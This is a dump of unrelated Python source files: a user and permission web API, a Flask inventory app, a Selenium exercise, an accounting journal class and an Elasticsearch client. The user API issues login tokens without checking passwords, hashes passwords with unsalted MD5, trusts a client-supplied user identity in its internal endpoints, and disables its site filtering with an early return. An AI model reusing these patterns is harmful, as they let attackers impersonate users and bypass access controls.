{'new': '新建', 'edit': '修改', 'find': '查询', 'remove': '删除'}\n elif mdb.layout.find({'_id': mongoid}).count() == 1:\n results[oid] = {'visit': '访问'}\n else:\n results[oid] = {'visit': '访问'}\n\n return results\n\n def _has(self, querys):\n results = []\n for query in querys:\n key = query['key']\n results.append(self.user_api.has_permissions(key, query['oid'], query['permissionNames']))\n return results\n\n def _get(self, querys):\n results = []\n for query in querys:\n key = query['key']\n results.append(self.user_api.get_permissions(key, query['oid'], query.get('permissionNames'), skip_special=True))\n return results\n\n def _get_all(self, querys):\n results = []\n for query in querys:\n key = query['key']\n oid = query['oid']\n\n # inherited permissions\n permission = self.user_api.get_permissions(key, oid, query.get('permissionNames'), skip_special=True)\n\n # direct (non-inherited) permissions\n spermission = self.user_api.get_spermissions(key, oid, query.get('permissionNames'))\n\n results.append({'permission': permission, 'spermission': spermission})\n\n return results\n\n def _allow(self, querys):\n results = []\n current_user = 
str(self.handler.current_user['current_user']['_id'])\n for query in querys:\n key = query['key']\n self.user_api.allow_permission(current_user, key, query['oid'], query['permissionNames'])\n results.append(True)\n\n return results\n\n def _deny(self, querys):\n results = []\n current_user = str(self.handler.current_user['current_user']['_id'])\n for query in querys:\n key = query['key']\n self.user_api.deny_permission(current_user, key, query['oid'], query['permissionNames'])\n results.append(True)\n\n return results\n\n def _update(self, querys):\n results = [] # plain list of per-query success flags\n current_user = str(self.handler.current_user['current_user']['_id'])\n for query in querys:\n key = query['key']\n\n names = query['permissionNames']\n if isinstance(names, dict):\n names = [key for key, value in names.items() if value]\n\n self.user_api.update_permissions(current_user, key, query['oid'], names)\n results.append(True)\n\n return results\n\n def _set_metadata(self, querys):\n results = []\n for query in querys:\n key = query['key']\n namespace = query['namespace']\n results.append(self.user_api.set_metadata(key, namespace, query['data']))\n\n return results\n\n def _get_metadata(self, querys):\n results = []\n for query in querys:\n key = query['key']\n namespace = query['namespace']\n results.append(self.user_api.get_metadata(key, namespace))\n\n return results\n\nclass SPermission(object):\n\n def get(self, handler, option, _querys=None):\n self.handler = handler\n if _querys is None:\n _querys = json.loads(handler.get_argument('querys'))\n\n system_id = handler.get_argument('system_id', None)\n querys = []\n for item in _querys:\n if item.get('fields'):\n item = item['fields']\n querys.append(item)\n\n self.user_api = UserManage()\n\n querys = filter_from_system(self.user_api, querys, system_id)\n\n if not querys:\n return self.handler.json({})\n\n if option == 'get':\n return self._get(querys)\n\n elif option == 'allow':\n return self._allow(querys)\n\n elif option == 'deny':\n return self._deny(querys)\n\n elif option == 'update':\n return self._update(querys)\n\n def _get(self, querys):\n results = []\n for query in querys:\n oid = query['oid']\n key = query['key']\n\n results.append(self.user_api.get_spermissions(key, oid, query.get('permissionNames')))\n\n return results\n\n def _allow(self, querys):\n results = []\n current_user = str(self.handler.current_user['current_user']['_id'])\n for query in querys:\n oid = query['oid']\n key = query['key']\n\n self.user_api.allow_spermission(current_user, key, oid, query['permissionNames'])\n results.append(True)\n\n return results\n\n def _deny(self, querys):\n results = []\n current_user = str(self.handler.current_user['current_user']['_id'])\n for query in querys:\n oid = query['oid']\n key = query['key']\n self.user_api.deny_spermission(current_user, key, oid, query['permissionNames'])\n results.append(True)\n\n return results\n\n def _update(self, querys):\n results = []\n current_user = str(self.handler.current_user['current_user']['_id'])\n for query in querys:\n oid = query['oid']\n key = query['key']\n\n names = query['permissionNames']\n if isinstance(names, dict):\n names = [key for key, value in names.items() if value]\n\n self.user_api.update_spermissions(current_user, key, oid, names)\n results.append(True)\n\n return results\n\nclass User(object):\n\n def get(self, handler, option, _querys=None):\n self.handler = handler\n system_id = handler.get_argument('system_id', None)\n if _querys is None:\n 
_querys = json.loads(handler.get_argument('querys'))\n querys = []\n for item in _querys:\n if item.get('fields'):\n item = item['fields']\n querys.append(item)\n\n self.user_api = UserManage()\n\n querys = filter_from_system(self.user_api, querys, system_id)\n\n if option == 'getparents':\n return self._get_parents(querys)\n\n elif option == 'updateparents':\n return self._update_parents(querys)\n\n elif option == 'isroot':\n return self._is_root(querys)\n\n elif option == 'isadmin':\n return self._is_admin(querys, system_id)\n\n elif option == 'listallows':\n return self._list_allows(querys, system_id)\n\n elif option == 'listdenys':\n return self._list_denys(querys, system_id)\n\n elif option == 'walk':\n return self._walk(querys)\n\n elif option == 'getchildren':\n return self._get_children(querys)\n\n elif option == 'search':\n return self._search(querys, system_id)\n\n elif option == 'get':\n return self._get(querys)\n\n elif option == 'add':\n return self._add(querys, system_id)\n\n elif option == 'update':\n return self._update(querys,system_id)\n\n elif option == 'enable':\n return self._enable(querys)\n\n elif option == 'disable':\n return self._disable(querys)\n\n elif option == 'remove':\n return self._remove(querys, system_id)\n\n elif option == 'listuser':\n return self._list_user(querys, system_id)\n\n elif option == 'listrole':\n return self._list_role(querys, 'role', system_id)\n\n elif option == 'listgroup':\n return self._list_role(querys, 'group', system_id)\n\n elif option == 'check':\n return self._check(querys, system_id)\n\n def get_children(self, key):\n pkeys = [x[0] for x in self.user_api.get_children(key) if key != x[0]]\n users = self.user_api.get_many(pkeys)\n\n results = []\n for user in users:\n results.append({\n 'id': user.id,\n 'name': user.name,\n 'alias': user.alias,\n 'type': user.type\n })\n return results\n\n def get_parents(self, key):\n pkeys = [x[0] for x in self.user_api.get_parents(key)]\n users = self.user_api.get_many(pkeys)\n\n results = []\n for user in users:\n results.append({\n 'id': user.id,\n 'name': user.name,\n 'alias': user.alias,\n 'type': user.type\n })\n return results\n\n def _get_parents(self, querys):\n results = []\n for query in querys:\n key = query['key']\n user = self.user_api.get(key)\n if user:\n results.append(self.get_parents(key))\n\n return results\n\n def _update_parents(self, querys):\n results = []\n\n with self.user_api.batch():\n for query in querys:\n key = query['key']\n self.user_api.update_parents(key, query['parents'])\n results.append(True)\n\n return results\n\n def _is_root(self, querys):\n results = []\n for query in querys:\n key = query['key']\n results.append(self.user_api.is_root(key))\n\n return results\n\n def _is_admin(self, querys, system_id):\n results = []\n for query in querys:\n key = query['key']\n results.append(self.user_api.is_admin(key, system_id))\n\n return results\n\n def _list_allows(self, querys, system_id):\n results = []\n for query in querys:\n key = query['key']\n results.append(self.user_api.list_allows(key))\n return results\n\n def _list_denys(self, querys, system_id):\n results = []\n for query in querys:\n key = query['key']\n results.append(self.user_api.list_denys(key))\n return results\n\n def _walk(self, querys):\n results = []\n for query in querys:\n key = query['key']\n for user, children, user_type in self.user_api.walk(key):\n results.append({\n 'id': user,\n 'type': user_type,\n 'children': children,\n })\n\n return results\n\n def _get_children(self, querys):\n 
results = []\n for query in querys:\n key = query['key']\n results.append(list(self.get_children(key)))\n\n return results\n\n def _search(self, querys, system_id):\n results = []\n user_types = ['all', self.user_api.user_type]\n role_types = ['all', 'role', 'group']\n\n for query in querys:\n user_type = query['type']\n condition = json2ObjectId(query['condition'])\n # 限制搜索,只能搜索这个站点下的用户或者角色\n condition['systems.$id'] = ObjectId(system_id)\n\n if user_type in user_types:\n with mdb.user.find(condition) as cursor:\n for item in cursor:\n results.append({\n 'id': str(item._id),\n 'name': item.name,\n 'alias': item.alias,\n 'type': self.user_api.user_type,\n 'children': self.get_children(str(item._id)),\n 'parents': self.get_parents(str(item._id)),\n })\n\n if user_type in role_types:\n\n if user_type != 'all':\n condition['type'] = user_type\n\n with mdb.role.find(condition) as cursor:\n for item in cursor:\n results.append({\n 'id': str(item._id),\n 'name': item.name,\n 'alias': item.alias,\n 'type': item.type,\n 'children': self.get_children(str(item._id)),\n 'parents': self.get_parents(str(item._id)),\n })\n\n return results\n\n def _disable(self, querys):\n results = []\n for query in querys:\n key = query['key']\n self.user_api.disable(key)\n results.append(True)\n\n return results\n\n def _enable(self, querys):\n results = []\n for query in querys:\n key = query['key']\n self.user_api.enable(key)\n results.append(True)\n\n return results\n\n def _get(self, querys):\n results = []\n for query in querys:\n key = query['key']\n node = self.user_api.get(key)\n\n if not node:\n continue\n\n result = {\n 'id': key,\n 'name': node.name,\n 'alias': node.alias,\n 'type': node.type,\n 'children': self.get_children(key),\n 'parents': self.get_parents(key),\n }\n\n if 'disable' in node:\n result['disable'] = node.disable\n\n if 'created' in node:\n result['created'] = node.created\n\n results.append(result)\n\n return results\n\n def _add(self, querys, system_id):\n results = []\n sub_db = sys_db( system_id = system_id)\n with self.user_api.batch():\n for query in querys:\n fields = query\n\n kw = fields.copy()\n user_type = kw.pop('type')\n parents = kw.pop('parents', False)\n kw['system'] = system_id\n\n user_id = self.user_api.add(user_type, **kw)\n\n if user_id is None:\n results.append(make_msg(403, '不能重复创建用户'))\n\n else:\n kw[\"_id\"] = ObjectId(user_id)\n\n # TODO 没有登录用户\n #sub_db['__user__'].save(kw)\n\n if parents:\n self.user_api.update_parents(user_id, parents)\n\n fields.pop('password', None)\n fields['id'] = user_id\n results.append(fields)\n\n return results\n\n def _update(self, querys, system_id):\n results = []\n sub_db = sys_db(system_id = system_id)\n with self.user_api.batch():\n for query in querys:\n fields = query\n key = query.pop('key')\n\n fields.pop('type', None)\n parents = fields.pop('parents', [])\n\n if fields:\n self.user_api.update(key, **fields)\n # TODO 没有登录用户\n #sub_db['__user__'].update(key,fields)\n\n if parents:\n self.user_api.update_parents(key, parents)\n\n results.append(True)\n\n return results\n\n def _remove(self, querys, system_id):\n results = []\n\n with self.user_api.batch():\n for query in querys:\n key = query['key']\n self.user_api.remove(key, system_id)\n results.append(True)\n\n return results\n\n def _list_user(self, querys, system_id):\n results = []\n\n for query in querys:\n\n condition = query.get('condition', {})\n condition.pop('systems', None)\n condition.pop('type', None)\n condition = json2ObjectId(condition)\n 
condition['systems.$id'] = ObjectId(system_id)\n\n paging = Paging()\n paging.size = int(query.get('size', 20))\n paging.index = int(query.get('page', 1))\n\n # parent 条件:只要这些角色/组的用户\n if query.get('parents'):\n _cond = []\n\n for parent in query['parents']:\n for user_id, user_type in self.user_api.get_children(parent):\n if user_type != self.user_api.user_type:\n continue\n _cond.append({'_id': ObjectId(user_id)})\n\n if not _cond:\n paging.count = 0\n result = paging.as_dict()\n result['results'] = {}\n results.append(result)\n continue\n\n condition.setdefault('$or', []).extend(_cond)\n\n with mdb.user.find(condition) as cursor:\n paging.count = cursor.count()\n result = paging.as_dict()\n result['results'] = []\n\n for user in cursor.skip(skip(paging)).limit(paging.size):\n user_id = str(user._id)\n try:\n children = self.get_children(user_id)\n except:\n continue\n user_id = str(user._id)\n result['results'].append({\n 'id': user_id,\n 'name': user.name,\n 'alias': user.alias,\n 'disable': user.get('disable', False),\n 'created': user.get('created', user._id.generation_time),\n 'type': 'user',\n 'children': children,\n 'parents': self.get_parents(user_id),\n })\n\n results.append(result)\n\n return results\n\n def _list_role(self, querys, type, system_id):\n results = []\n\n for query in querys:\n\n condition = query.get('condition', {})\n condition.pop('systems', None)\n condition.pop('type', None)\n condition = json2ObjectId(condition)\n condition['systems.$id'] = ObjectId(system_id)\n condition['type'] = type\n\n paging = Paging()\n paging.size = int(query.get('size', 20))\n paging.index = int(query.get('page', 1))\n\n # parent 条件:只要这些角色/组的用户\n if query.get('parents'):\n _cond = []\n\n for parent in query['parents']:\n for user_id, user_type in self.user_api.get_children(parent):\n if user_type != self.user_api.role_type:\n continue\n _cond.append({'_id': ObjectId(user_id)})\n\n if not _cond:\n paging.count = 0\n result = paging.as_dict()\n result['results'] = {}\n results.append(result)\n continue\n\n condition.setdefault('$or', []).extend(_cond)\n\n with mdb.role.find(condition) as cursor:\n paging.count = cursor.count()\n result = paging.as_dict()\n result['results'] = []\n\n for user in cursor.skip(skip(paging)).limit(paging.size):\n user_id = str(user._id)\n result['results'].append(self.user_api.get(user_id))\n\n results.append(result)\n\n return results\n\n def _check(self, querys, system_id):\n \"\"\"\n 用户在全部站点只允许唯一的name字段,角色/用户组值允许每一个站点拥有唯一name字段\n \"\"\"\n results = []\n\n for query in querys:\n fields = query\n user_type = fields['type']\n\n if user_type == self.user_api.user_type:\n results.append(mdb.user.find_one({'name': fields['name']}, {'_id': 1}) is not None)\n\n else:\n result = mdb.role.find_one({'name': fields['name'], 'systems.$id': ObjectId(system_id)}, {'_id': 1})\n results.append(result is not None)\n\n return results\n\nuser = User()\npermission = Permission()\nspermission = SPermission()\n\n@url(\"/api/user/permission/(.*)\")\nclass Permission1(HandlerBase):\n\n def get(self, option):\n results = permission.get(self, option)\n return self.json(results)\n\n def post(self, option):\n results = permission.get(self, option)\n return self.json(results)\n\n@url(\"/api/user/spermission/(.*)\")\nclass SPermission1(HandlerBase):\n\n def get(self, option):\n results = spermission.get(self, option)\n return self.json(results)\n\n def post(self, option):\n results = spermission.get(self, option)\n return self.json(results)\n\n@url(\"/api/user/batch\", 
order=1)\nclass Batch(HandlerBase):\n\n def get(self):\n return self.post()\n\n def post(self):\n querys = json.loads(self.get_argument('querys'))\n results = []\n\n for query in querys:\n\n # 兼容 user, permission, spermission 需要的格式\n fields = query.get('fields')\n if not fields:\n fields = [{}]\n else:\n fields = [fields]\n\n try:\n scope = query['scope']\n action = query['action']\n\n if scope == 'user':\n data = user.get(self, action, fields)\n elif scope == 'permission':\n data = permission.get(self, action, fields)\n else:\n data = spermission.get(self, action, fields)\n\n # user,permission, spermission对象本身支持批量处理\n # batch每一个query默认是单个请求,所以取返回结果第一个\n data = data[0] if data and len(data) > 0 else {}\n if isinstance(data, Result):\n result = data\n else:\n result = {'data': data, 'status': True, 'statusCode': 200, 'message': '成功'}\n\n except KeyError:\n traceback.print_exc()\n result = {'data': {}, 'status': False, 'statusCode': 400, 'message': '无法获得参数'}\n\n except:\n traceback.print_exc()\n result = {'data': {}, 'status': False, 'statusCode': 500, 'message': '服务内部错误'}\n\n results.append(result)\n\n return self.json(results)\n\n# 这个类专门用于注册,不需要验证权限\n@url(\"/api/user/add\", order=1)\nclass RegisterUser(OpenRequestHandler):\n\n def get(self):\n results = user.get(self, 'add')\n return self.json(results)\n\n def post(self):\n results = user.get(self, 'add')\n return self.json(results)\n\n@url(\"/api/user/check\", order=1)\nclass CheckUser(OpenRequestHandler):\n\n def get(self):\n results = user.get(self, 'check')\n return self.json(results)\n\n def post(self):\n results = user.get(self, 'check')\n return self.json(results)\n\n@url(\"/api/user/(((?!/).)*$)\")\nclass User1(HandlerBase):\n\n def get(self, option, _):\n results = user.get(self, option)\n return self.json(results)\n\n def post(self, option, _):\n results = user.get(self, option)\n return self.json(results)\n\n@url(\"/api/user/token\", order=1)\nclass UserToken(OpenRequestHandler):\n \"\"\"\n 开放用户用API方式登陆系统\n 这个APi返回一个token,包含了:\n 1,哪个用户\n 2,这个token过期时间, 默认是一个小时\n \"\"\"\n\n def get(self):\n return self.post()\n\n def post(self):\n name = self.get_argument('username', '')\n password = self.get_argument('password', '')\n expires = self.get_argument('expires', '3600')\n\n if not name:\n return self.json({\n 'status': False,\n 'statusCode': 400,\n 'message': '参数错误',\n 'data': {}\n })\n\n try:\n expires = int(expires)\n except:\n return self.json({\n 'status': False,\n 'statusCode': 400,\n 'message': '参数错误',\n 'data': {}\n })\n\n if password:\n password = hashlib.md5(password).hexdigest()\n\n #user = mdb.user.find_one({'name': name, 'password': password}, {'name': 1, 'alias': 1, 'email': 1})\n user = mdb.user.find_one({'name': name}, {'name': 1, 'alias': 1, 'email': 1})\n\n if not user:\n return self.json({\n 'status': False,\n 'statusCode': 404,\n 'message': '没有找到这个用户',\n 'data': {}\n })\n\n user_id = user.pop('_id')\n user['id'] = str(user_id)\n\n token = UserSign.dumps({'id': user['id']}, expires)\n\n return self.json({\n 'status': True,\n 'statusCode': 200,\n 'message': '成功',\n 'data': {'token': token, 'user': user}\n })\n\n@url(\"/api/user/token2\", order=1)\nclass UserToken2(OpenRequestHandler):\n \"\"\"\n 开放用户用API方式登陆系统\n 这个APi返回一个token,包含了:\n 1,哪个用户\n 2,这个token过期时间, 默认是一个小时\n \"\"\"\n\n def get(self):\n return self.post()\n\n def post(self):\n name = self.get_argument('username', '')\n key = self.get_argument('key', '')\n timestamp = self.get_argument('timestamp', '')\n sign = self.get_argument('sign', '')\n expires = 
self.get_argument('expires', '3600')\n\n        if not name or not key or not timestamp or not sign:\n            return self.json(make_msg(400, '参数错误'))\n\n        try:\n            expires = int(expires)\n            sign = str(sign)\n            name = str(name)\n            key = str(key)\n            _timestamp = int(timestamp)\n        except ValueError:\n            return self.json(make_msg(400, '参数错误'))\n\n        # reject signatures older than 5 minutes\n        current_time = int(time.time())\n        if current_time - _timestamp > 300:\n            return self.json(make_msg(408, '签名已超时', data={'timestamp': current_time}))\n\n        user = mdb.user.find_one({'name': name}, {'password': 1, 'disable': 1})\n\n        if not user:\n            return self.json(make_msg(404, '没有找到这个用户'))\n\n        if user.get('disable'):\n            return self.json(make_msg(403, '用户没有权限登陆'))\n\n        # verify the signature\n        md5 = hashlib.md5()\n        md5.update(key)\n        md5.update(settings.OPEN_KEY)\n        md5.update(str(timestamp))\n        md5.update(name)\n        md5.update(user.get('password'))\n\n        if md5.hexdigest() != sign:\n            return self.json(make_msg(500, '验证签名失败'))\n\n        token = UserSign.dumps({'id': str(user['_id']), 'key': key}, expires)\n\n        return self.json(make_msg(200, data=token))\n\n# the following three classes are internal APIs with relatively weak security; they are not exposed to the outside\n@url(\"/_inside/api/user/permission/(.*)\")\nclass Permission2(OpenHandlerBase):\n\n    def get(self, option):\n        cuser = self.get_argument('cuser', {})\n        if cuser:\n            self.current_user = json.loads(cuser)\n            sid = self.session.generate_sid()\n            self.set_secure_cookie(sid, pickle.dumps(self.current_user))\n        return self.json(permission.get(self, option))\n\n@url(\"/_inside/api/user/spermission/(.*)\")\nclass SPermission2(OpenHandlerBase):\n\n    def get(self, option):\n        cuser = self.get_argument('cuser', {})\n        if cuser:\n            self.current_user = json.loads(cuser)\n            sid = self.session.generate_sid()\n            self.set_secure_cookie(sid, pickle.dumps(self.current_user))\n        return self.json(spermission.get(self, option))\n\n@url(\"/_inside/api/user/(((?!/).)*$)\")\nclass User2(OpenHandlerBase):\n\n    def get(self, option, _):\n        cuser = self.get_argument('cuser', {})\n        if cuser:\n            self.current_user = json.loads(cuser)\n            sid = self.session.generate_sid()\n            self.set_secure_cookie(sid, pickle.dumps(self.current_user))\n        return self.json(user.get(self, option))\n\ndef filter_from_system(user_api, querys, system_id):\n    \"\"\" Filter querys, dropping requests that do not belong to this site (system_id)\n\n    1. without a system_id no filtering is needed\n    2. queries without a key are left alone; these are either unimportant or already filtered by the action itself at execution time, e.g. the 
list_user, list_role, list_group and search methods\n    \"\"\"\n    # NOTE: filtering is currently disabled by this early return; the code below is unreachable\n    return querys\n\n    if not system_id:\n        return querys\n\n    results = []\n\n    for query in querys:\n        key = query.get('key')\n        if not key or user_api.review(key, system_id) or key == '547edcaafb6c9be44b48a616':\n            results.append(query)\n\n    return results\n\n@url(\"/api/user/login/confirm\")\nclass ApiLogin(OpenHandlerBase):\n\n    def get(self):\n        return self.post()\n\n    def post(self):\n        \"\"\" Verify the username and password\n\n        The password is expected to already be the hashed value\n        \"\"\"\n\n        username = self.get_argument('username')\n        password = self.get_argument('password')\n\n        if not username or not password:\n            return self.json({'status': 2, 'message': u'用户名或者密码不能为空'})\n\n        result = mdb.user.find({'name': username, 'password': password})\n\n        if result.count() == 0:\n            return self.json({'status': 1, 'message': u'用户名或者密码错误'})\n\n        else:\n            return self.json({'status': 0})\n","sub_path":"handlers/user/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":31607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"58696309","text":"from datetime import datetime\nfrom decimal import Decimal\nfrom flask import Blueprint, render_template, redirect, url_for, request, flash, session\nfrom flask_login import current_user, login_required\nfrom sqlalchemy import func\nfrom inventoryapp import db\nfrom inventoryapp.models import Inventory\nfrom inventoryapp.inventory.forms import InventoryForm, UpdateInventoryItemForm\nfrom inventoryapp.inventory.utils import calc_time_delta, remove_exponent\n\ninven = Blueprint('inventory', __name__) # pass in the name of our blueprint too: \"inventory\". set it to \"inven\" here so no collisions\n\n\n@inven.route('/inventory')\n@login_required\ndef inventory():\n    all_inventory = Inventory.query.order_by(Inventory.last_updated.desc()).all() # the desc() puts the most recently updated items first\n    \n    return render_template('inventory.html', inventory = all_inventory, calc_time_delta = calc_time_delta, remove_exponent = remove_exponent)\n\n\n@inven.route('/inventory/<int:id>') # view a singular item\n@login_required\ndef item(id):\n    item = Inventory.query.get_or_404(id)\n    return render_template('item.html', title = item.name, item = item)\n\n\n@inven.route('/inventory/new', methods=['GET', 'POST'])\n@login_required\ndef new_item():\n    form = InventoryForm()\n    if form.validate_on_submit():\n        item = Inventory(name = form.name.data, size = form.size.data, count = form.count.data, description = form.description.data)\n\n        db.session.add(item)\n        db.session.commit()\n        flash(\"New item added\", 'success')\n        return redirect(url_for('inventory.inventory')) # inventory route in inventory package?\n    return render_template('new_item.html', form = form)\n\n\n@inven.route('/inventory/<int:id>/update', methods=['GET', 'POST'])\n@login_required\ndef update_item(id):\n    form = UpdateInventoryItemForm()\n    item = Inventory.query.get_or_404(id)\n    if form.validate_on_submit(): # user submitted valid updated post\n        item.count = form.count.data\n        item.last_updated = datetime.utcnow() # update the last updated time for this item to \"now\"\n        db.session.commit()\n        flash('Your item has been updated!', 'success')\n        return redirect(url_for('inventory.inventory', id = item.id)) # should redirect to url_for('inventory.item') but not implemented yet, so just go back to inventory\n    elif request.method == 'GET': # user just visited the edit page of their item so we populate the field with the current item's data\n        form.name.data = item.name\n        form.size.data = item.size\n
        form.count.data = item.count # can't remove exponent here because the Form is set to a DecimalField anyways\n        form.description.data = item.description\n    return render_template('update.html', title = 'Update item count', form = form, remove_exponent = remove_exponent, id = id)\n\n\n@inven.route('/inventory/<int:id>/delete', methods=['POST'])\n@login_required\ndef delete_item(id):\n    item = Inventory.query.get_or_404(id)\n    db.session.delete(item)\n    db.session.commit()\n    flash(\"Item deleted successfully\", 'success')\n    return redirect(url_for('inventory.inventory'))\n\n\n\"\"\"\nIncomplete functionality\n\"\"\"\n@inven.route('/inventory/stocktake', methods=['GET', 'POST'])\n@login_required\ndef stocktake():\n    all_inventory = Inventory.query.order_by(Inventory.last_updated.desc()).all()\n    form = UpdateInventoryItemForm()\n    return render_template('stocktake.html', inventory = all_inventory, calc_time_delta = calc_time_delta, remove_exponent = remove_exponent)\n\n\n@inven.route('/inventory/purchasing', methods=['GET', 'POST'])\n@login_required\ndef purchasing():\n    # get will give them a checklist for which items, post returns a shopping list\n    all_inventory = Inventory.query.order_by(Inventory.last_updated.desc()).all()\n    count = len(all_inventory)\n    \n\n    if request.method == 'POST':\n        list_checked = []\n        i = 1\n        while i < count + 1:\n            x = request.form.get(str(i), \"off\")\n            if x == 'on':\n                list_checked.append(i)\n            i = i + 1\n        if len(list_checked) != 0: # not an empty list. the user did select at least one checkbox\n            return render_template('purchasing_list.html', inventory = all_inventory, list_checked = list_checked, remove_exponent = remove_exponent)\n        \n        return redirect(url_for('inventory.inventory'))\n\n    return render_template('purchasing.html', inventory = all_inventory, count = count)\n\n","sub_path":"inventoryapp/inventory/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"378702715","text":"from selenium import webdriver\nimport time \nimport math\nimport pyperclip\n\nlink = \"http://suninjuly.github.io/alert_accept.html\"\n\ndef calc(x):\n    return str(math.log(abs(12*math.sin(int(x)))))\n\ntry:\n    browser = webdriver.Chrome()\n    browser.get(link)\n\n    browser.find_element_by_css_selector('button.btn').click()\n    browser.switch_to.alert.accept()\n    browser.find_element_by_id('answer').send_keys(calc(browser.find_element_by_id('input_value').text))\n    browser.find_element_by_css_selector('button.btn').click()\n    time.sleep(3)\n    \n    alert = browser.switch_to.alert\n    alert_text = alert.text\n    addToClipBoard = alert_text.split(': ')[-1]\n    pyperclip.copy(addToClipBoard)\n    time.sleep(1)\n\nfinally:\n    # close the browser after all the interactions\n    browser.quit()\n\n# don't forget to leave an empty line at the end of the file\n","sub_path":"Tests lesson 2/stepik_selenium_2.3.4.py","file_name":"stepik_selenium_2.3.4.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"135141093","text":"from decimal import Decimal\nimport datetime as dt\n\nclass TransactionError(Exception):\n    pass\n\nclass Transaction:\n    MAX_NOTE_LEN = 50\n    def __init__(self, debits: dict, credits: dict, note):\n        amts_to_dec = lambda entry: {account: Decimal(entry[account]) for account in entry} \n
        # check the type first so len() is never called on a non-string\n        if not isinstance(note, str):\n            raise TransactionError(\"attempted to set non-str value to note\")\n        elif len(note) > self.MAX_NOTE_LEN:\n            raise TransactionError(f\"length of note is greater than {self.MAX_NOTE_LEN}\")\n        \n        self._note = note\n        self._debits = amts_to_dec(debits)\n        self._credits = amts_to_dec(credits)\n\n        debits_sum = sum(self._debits.values())\n        credits_sum = sum(self._credits.values())\n        if debits_sum != credits_sum:\n            raise TransactionError(f\"debit of {debits_sum} doesn't match credit of {credits_sum}\")\n        self._total = debits_sum\n\n    @property\n    def note(self):\n        return self._note\n\n    @note.setter\n    def note(self, new_note):\n        # same ordering as __init__: type check before len()\n        if not isinstance(new_note, str):\n            raise TypeError(\"attempted to set non-str value to note\")\n        elif len(new_note) > self.MAX_NOTE_LEN:\n            raise ValueError(f\"length of note is greater than {self.MAX_NOTE_LEN}\")\n        self._note = new_note\n\n    @property\n    def total(self) -> Decimal:\n        return self._total\n\n    def debit_accounts(self):\n        return self._debits.keys()\n\n    def credit_accounts(self):\n        return self._credits.keys()\n\n    def debit_value(self, account) -> Decimal:\n        if account not in self._debits:\n            raise KeyError(f\"{account} not a debited account in this transaction\")\n        return self._debits[account]\n\n    def credit_value(self, account) -> Decimal:\n        if account not in self._credits:\n            raise KeyError(f\"{account} not a credited account in this transaction\")\n        return self._credits[account]\n\nclass Journal():\n    def __init__(self):\n        self._entries = dict()\n        self._total = Decimal(0)\n\n    def __getitem__(self, val):\n        \"retrieve a transaction at a date or within a range of dates if val is a slice\"\n        if isinstance(val, slice):\n            new_journal = Journal()\n            date_from = val.start if val.start else dt.date.min\n            date_to = val.stop if val.stop else dt.date.max\n            new_journal._entries = {date: trans for date, trans in self._entries.items() \n                                    if date < date_to and date >= date_from}\n            new_journal._total = sum(tran.total for tran in new_journal._entries.values())\n            return new_journal\n        else:\n            return self._entries[val]\n\n    def __setitem__(self, date, transaction: Transaction):\n        if date not in self._entries:\n            self._entries[date] = []\n        self._entries[date].append(transaction)\n        self._total += transaction.total\n\n    def __iter__(self):\n        return iter(self._entries)\n\n    def __len__(self):\n        return len(self._entries)\n","sub_path":"buddy/journal.py","file_name":"journal.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"27246935","text":"import elasticsearch\nimport json, argparse, scdv\n\nclass elasticsearchClient():\n    def __init__(self, host, port, index):\n        self.host = host\n        self.port = port\n        self.index = index\n        self.client = elasticsearch.Elasticsearch(self.host + \":\" + self.port)\n\n    # tokenize a sentence\n    def tokenize(self, sentence):\n        body_ = {\"analyzer\": \"sudachi_analyzer\", \"text\": sentence}\n        json_tokens = self.client.indices.analyze(\n            index = self.index, body=body_)\n\n        tokens = [token['token'] for token in json_tokens['tokens']]\n        return tokens\n\n    def parse_data(self, items):\n        results = []\n\n        for item in items:\n            index = json.dumps(item['_id'])\n            category = json.dumps(\n                item['_source']['業種(大分類)'], \n                indent=2, ensure_ascii=False)\n            sentence = json.dumps(\n                item['_source']['文章'], \n                indent=2, ensure_ascii=False)\n\n            tokens = self.tokenize(sentence)\n            results.append((index, category, sentence, tokens))\n        return results\n\n    # fetch all documents using the scroll API\n    def get_all_data(self, scroll_time, scroll_size):\n        results = []\n\n        data = self.client.search(\n            index = self.index,\n            scroll = 
scroll_time,\n            size = scroll_size,\n            body = {})\n        sid = data['_scroll_id']\n        scroll_size = len(data['hits']['hits'])\n\n        results = self.parse_data(data['hits']['hits'])\n\n        while scroll_size > 0:\n            data = self.client.scroll(\n                scroll_id = sid, \n                scroll = scroll_time)\n\n            sid = data['_scroll_id']\n            scroll_size = len(data['hits']['hits'])\n            scroll_results = self.parse_data(data['hits']['hits'])\n            results.extend(scroll_results)\n\n        return results\n\n    def update(self, row_id, body):\n        response = self.client.update(\n            index = self.index, \n            id = row_id, \n            body = body)\n        print(response)\n\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--host', type=str)\n    parser.add_argument('--port', type=str, default='9200')\n    parser.add_argument('--index', type=str)\n    parser.add_argument('--output', type=str)\n    parser.add_argument('--scroll_limit', type=str, default='1m')\n    parser.add_argument('--scroll_size', type=int, default=100)\n\n    return parser.parse_args()\n\ndef main(args):\n    client = elasticsearchClient(args.host, args.port, args.index)\n    results = client.get_all_data(args.scroll_limit, args.scroll_size)\n\n    output_txt = args.output.replace(\".csv\", \".txt\")\n    with open(args.output, \"w\") as f_csv:\n        with open(output_txt, \"w\") as f_txt:\n            f_csv.writelines('ID,業種(大分類),文章,分かち書き\\n')\n\n            for result in results:\n                tokens = \" \".join(result[3])\n                f_csv.writelines(result[0] + ',' + result[1] + ',' + result[2] + ',\"' + tokens + '\"\\n')\n                f_txt.writelines(tokens + '\\n')\n    scdv_vec = scdv.build_model(args.output, 20, \"gmm_cluster.pkl\", \"gmm_prob_cluster.pkl\")\n\n    for row_id, vector in scdv_vec:\n        client.update(row_id, {'doc':{'scdv_vector':vector.tolist()}})\n\n\nif __name__ == '__main__':\n    main(parse_args())\n","sub_path":"es_client.py","file_name":"es_client.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"310618772","text":"#\n# 